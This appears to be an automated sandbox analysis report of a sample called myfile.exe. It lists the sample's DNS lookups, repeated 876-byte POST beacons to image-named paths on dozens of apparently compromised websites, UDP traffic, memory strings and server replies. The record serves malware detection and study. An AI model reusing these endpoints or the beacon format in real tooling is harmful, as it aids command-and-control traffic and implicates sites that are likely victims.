Source: global traffic	HTTP traffic detected: GET /content/images/gv.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: karnesstanleyhvac.com
Source: global traffic	HTTP traffic detected: POST /content/temp/pg.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: altitudeboise.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: altitudetrampolinepark.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.altitudetrampolinepark.com
Source: global traffic	HTTP traffic detected: POST /static/tmp/vd.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: lexced.com
Source: global traffic	HTTP traffic detected: GET /static/tmp/vd.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.lexced.com
Source: global traffic	HTTP traffic detected: POST /data/graphic/tcafyhpt.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: chainofhopeeurope.eu
Source: global traffic	HTTP traffic detected: POST /data/game/mfkyhvlfokmitv.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: bayshoreelite.com
Source: global traffic	HTTP traffic detected: POST /admin/graphic/qhok.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: mursall.de
Source: global traffic	HTTP traffic detected: POST /include/tmp/vzac.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: testitjavertailut.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: princebet88.site
Source: global traffic	HTTP traffic detected: POST /admin/graphic/tajahxayexuseayc.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: vitoriaecoturismo.com.br
Source: global traffic	HTTP traffic detected: POST /admin/game/gatm.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: georgemuncey.com
Source: global traffic	HTTP traffic detected: GET /admin/game/gatm.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.georgemuncey.com
Source: global traffic	HTTP traffic detected: POST /static/pictures/qbadcqiwyz.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: nbva.co.uk
Source: global traffic	HTTP traffic detected: POST /content/pictures/efwjwa.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: c-sprop.com
Source: global traffic	HTTP traffic detected: POST /data/assets/vdtrmjnm.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: relevantonline.eu
Source: global traffic	HTTP traffic detected: POST /news/temp/md.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: abulanov.com
Source: global traffic	HTTP traffic detected: POST /wp-content/graphic/wrza.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: maxcube24.com.ua
Source: global traffic	HTTP traffic detected: POST /uploads/pictures/gcgicdxmun.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: kenmccallum.com
Source: global traffic	HTTP traffic detected: POST /news/pictures/numjznnuau.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: stage-infirmier.fr
Source: global traffic	HTTP traffic detected: POST /wp-content/game/doiathwnvkwf.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: mieleshopping.it
Source: global traffic	HTTP traffic detected: GET /wp-content/game/doiathwnvkwf.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.mieleshopping.it
Source: global traffic	HTTP traffic detected: POST /data/assets/hxdtlt.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: holocine.de
Source: global traffic	HTTP traffic detected: POST /wp-content/pictures/vuvqcuzorejq.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: oscommunity.de
Source: global traffic	HTTP traffic detected: POST /wp-content/temp/wkeqlpss.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: bundan.com
Source: global traffic	HTTP traffic detected: POST /news/temp/wpuatzictpgv.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: hostaletdelsindians.es
Source: global traffic	HTTP traffic detected: GET /news/temp/wpuatzictpgv.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.hostaletdelsindians.es
Source: global traffic	HTTP traffic detected: POST /content/assets/jlbaveucagau.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: almamidwifery.com
Source: global traffic	HTTP traffic detected: GET /content/assets/jlbaveucagau.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.almamidwifery.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /content/images/gv.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: karnesstanleyhvac.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: altitudetrampolinepark.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.altitudetrampolinepark.com
Source: global traffic	HTTP traffic detected: GET /static/tmp/vd.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.lexced.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: princebet88.site
Source: global traffic	HTTP traffic detected: GET /admin/game/gatm.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.georgemuncey.com
Source: global traffic	HTTP traffic detected: GET /wp-content/game/doiathwnvkwf.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.mieleshopping.it
Source: global traffic	HTTP traffic detected: GET /news/temp/wpuatzictpgv.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.hostaletdelsindians.es
Source: global traffic	HTTP traffic detected: GET /content/assets/jlbaveucagau.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.almamidwifery.com

Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.lexced.com/#website","url":"https://www.lexced.com/","name":"LexCED","description":"Banca dati giuridica","publisher":{"@id":"https://www.lexced.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.lexced.com/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https://www.lexced.com/#organization","name":"LexCED","url":"https://www.lexced.com/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https://www.lexced.com/#/schema/logo/image/","url":"https://www.lexced.com/wp-content/uploads/2018/08/lexced-banca-dati-giuridica.jpg","contentUrl":"https://www.lexced.com/wp-content/uploads/2018/08/lexced-banca-dati-giuridica.jpg","width":250,"height":60,"caption":"LexCED"},"image":{"@id":"https://www.lexced.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/lexced.it/"]}]}</script> equals www.facebook.com (Facebook)
Source: myfile.exe, 00000000.00000003.2589188241.0000000002C33000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894563140.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589424950.0000000005B61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" > equals www.facebook.com (Facebook)
Source: myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: chomiksy.netns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" > equals www.facebook.com (Facebook)
Source: myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" > equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: parksideseniorliving.net
Source: global traffic	DNS traffic detected: DNS query: 90nguyentuan.com
Source: global traffic	DNS traffic detected: DNS query: enactusnhlstenden.com
Source: global traffic	DNS traffic detected: DNS query: avisioninthedesert.com
Source: global traffic	DNS traffic detected: DNS query: lashandbrowenvy.com
Source: global traffic	DNS traffic detected: DNS query: satoblog.org
Source: global traffic	DNS traffic detected: DNS query: rsidesigns.com
Source: global traffic	DNS traffic detected: DNS query: pansionatblago.ru
Source: global traffic	DNS traffic detected: DNS query: magrinya.net
Source: global traffic	DNS traffic detected: DNS query: baikalflot.ru
Source: global traffic	DNS traffic detected: DNS query: bd2fly.com
Source: global traffic	DNS traffic detected: DNS query: business-basic.de
Source: global traffic	DNS traffic detected: DNS query: afbudsrejserallinclusive.dk
Source: global traffic	DNS traffic detected: DNS query: m2graph.fr
Source: global traffic	DNS traffic detected: DNS query: stanleyqualitysystems.com
Source: global traffic	DNS traffic detected: DNS query: karnesstanleyhvac.com
Source: global traffic	DNS traffic detected: DNS query: altitudeboise.com
Source: global traffic	DNS traffic detected: DNS query: altitudetrampolinepark.com
Source: global traffic	DNS traffic detected: DNS query: www.altitudetrampolinepark.com
Source: global traffic	DNS traffic detected: DNS query: lexced.com
Source: global traffic	DNS traffic detected: DNS query: www.lexced.com
Source: global traffic	DNS traffic detected: DNS query: chainofhopeeurope.eu
Source: global traffic	DNS traffic detected: DNS query: bayshoreelite.com
Source: global traffic	DNS traffic detected: DNS query: mursall.de
Source: global traffic	DNS traffic detected: DNS query: amelielecompte.wordpress.com
Source: global traffic	DNS traffic detected: DNS query: wribrazil.com
Source: global traffic	DNS traffic detected: DNS query: testitjavertailut.net
Source: global traffic	DNS traffic detected: DNS query: princebet88.site
Source: global traffic	DNS traffic detected: DNS query: chomiksy.net
Source: global traffic	DNS traffic detected: DNS query: vitoriaecoturismo.com.br
Source: global traffic	DNS traffic detected: DNS query: georgemuncey.com
Source: global traffic	DNS traffic detected: DNS query: www.georgemuncey.com
Source: global traffic	DNS traffic detected: DNS query: funworx.de
Source: global traffic	DNS traffic detected: DNS query: nbva.co.uk
Source: global traffic	DNS traffic detected: DNS query: c-sprop.com
Source: global traffic	DNS traffic detected: DNS query: relevantonline.eu
Source: global traffic	DNS traffic detected: DNS query: abulanov.com
Source: global traffic	DNS traffic detected: DNS query: maxcube24.com.ua
Source: global traffic	DNS traffic detected: DNS query: kenmccallum.com
Source: global traffic	DNS traffic detected: DNS query: stage-infirmier.fr
Source: global traffic	DNS traffic detected: DNS query: skoczynski.eu
Source: global traffic	DNS traffic detected: DNS query: mieleshopping.it
Source: global traffic	DNS traffic detected: DNS query: www.mieleshopping.it
Source: global traffic	DNS traffic detected: DNS query: holocine.de
Source: global traffic	DNS traffic detected: DNS query: oscommunity.de
Source: global traffic	DNS traffic detected: DNS query: ikadomus.com
Source: global traffic	DNS traffic detected: DNS query: bundan.com
Source: global traffic	DNS traffic detected: DNS query: davedavisphotos.com
Source: global traffic	DNS traffic detected: DNS query: activeterroristwarningcompany.com
Source: global traffic	DNS traffic detected: DNS query: hostaletdelsindians.es
Source: global traffic	DNS traffic detected: DNS query: www.hostaletdelsindians.es
Source: global traffic	DNS traffic detected: DNS query: almamidwifery.com
Source: global traffic	DNS traffic detected: DNS query: www.almamidwifery.com
Source: global traffic	DNS traffic detected: DNS query: innervisions-id.com

Source: unknown

HTTP traffic detected: POST /admin/temp/eghuey.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: parksideseniorliving.net

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Cache-Enabled: TrueX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockLink: <https://parksideseniorliving.net/wp-json/>; rel="https://api.w.org/"X-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, must-revalidate, max-age=0content-security-policy: upgrade-insecure-requestsexpires: Wed, 11 Jan 1984 05:00:00 GMTlink: <https://lashandbrowenvy.com/wp-json/>; rel="https://api.w.org/"strict-transport-security: max-age=300strict-transport-security: max-age=31536000; includeSubDomainsx-cacheproxy-retries: 0/2x-content-type-options: nosniffx-fawn-proc-count: 1,0,24x-php-version: 8.0x-xss-protection: 1; mode=blockx-backend: varnish_sslCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8c065e8d9c134390-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Sep 2024 10:07:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.3Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=3846c15c8bd216c772f1d36ac5b4868d; path=/
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Mon, 09 Sep 2024 10:07:11 GMTServer: ApacheX-Powered-By: PHP/8.0.30Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://magrinya.net/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://www.afbudsrejserallinclusive.dk/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Mon, 09 Sep 2024 10:07:14 GMTserver: LiteSpeedvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:17 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://karnesstanleyhvac.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/8.3.11Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.lexced.com/wp-json/>; rel="https://api.w.org/"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:24 GMTServer: Apache/2.4.61 (Debian)Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.chainofhopeeurope.eu/wp-json/>; rel="https://api.w.org/"Upgrade: h2Connection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, must-revalidate, max-age=0content-security-policy: upgrade-insecure-requestsexpires: Wed, 11 Jan 1984 05:00:00 GMTlink: <https://bayshoreelite.com/wp-json/>; rel="https://api.w.org/"strict-transport-security: max-age=300strict-transport-security: max-age=31536000; includeSubDomainsx-cacheproxy-retries: 0/2x-content-type-options: nosniffx-fawn-proc-count: 1,0,24x-php-version: 7.4x-xss-protection: 1; mode=blockx-backend: varnish_sslCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8c065f050cc80c7e-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.2.23Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0x-frame-options: denyx-xss-protection: 1; mode=blockx-content-type-options: nosniffstrict-transport-security: max-age=31536000; includeSubDomainsreferrer-policy: no-referrerpermissions-policy: accelerometer=(); ambient-light-sensor=(); autoplay=(self); camera=(); encrypted-media=(); fullscreen; geolocation=(self); gyroscope=(); magnetometer=(); microphone=(); midi=(); payment=(); picture-in-picture=(self); speaker=(); usb=(); vr=()content-security-policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' https: data: *.mursall.de;WPO-Cache-Status: not cachedWPO-Cache-Message: The request method was not GET (POST)Link: <https://mursall.de/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:31 GMTContent-Type: text/htmlContent-Length: 146Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.15.8.3Date: Mon, 09 Sep 2024 10:07:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-store,no-cachePragma: no-cacheSet-Cookie: TiPMix=77.60889268289033; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=NoneSet-Cookie: x-ms-routing-name=self; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=NoneStrict-Transport-Security: max-age=2592000Request-Context: appId=cid-v1:64640e46-9cd2-4413-9485-c7395dd99be8x-azure-ref: 20240909T100733Z-15855465dc7b6hwv4tcxcnnqr00000000r1g000000005u3bX-Cache: CONFIG_NOCACHE
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://nbva.co.uk/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 799_HTTP.404,799_HTTP.503x-litespeed-cache-control: no-cachetransfer-encoding: chunkeddate: Mon, 09 Sep 2024 10:07:36 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Sep 2024 10:07:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeX-Seen-By: T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLho2HUitPUf9N0/utZJ1PDYm++C2XkuTvnlRFg2XiSDLServer: PepyakaX-Wix-Request-Id: 1725876457.2921179646686126538X-Content-Type-Options: nosniff
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:38 GMTServer: Apache/2Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://relevantonline.eu/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.23.2Date: Mon, 09 Sep 2024 10:07:39 GMTContent-Type: text/htmlContent-Length: 153Connection: close
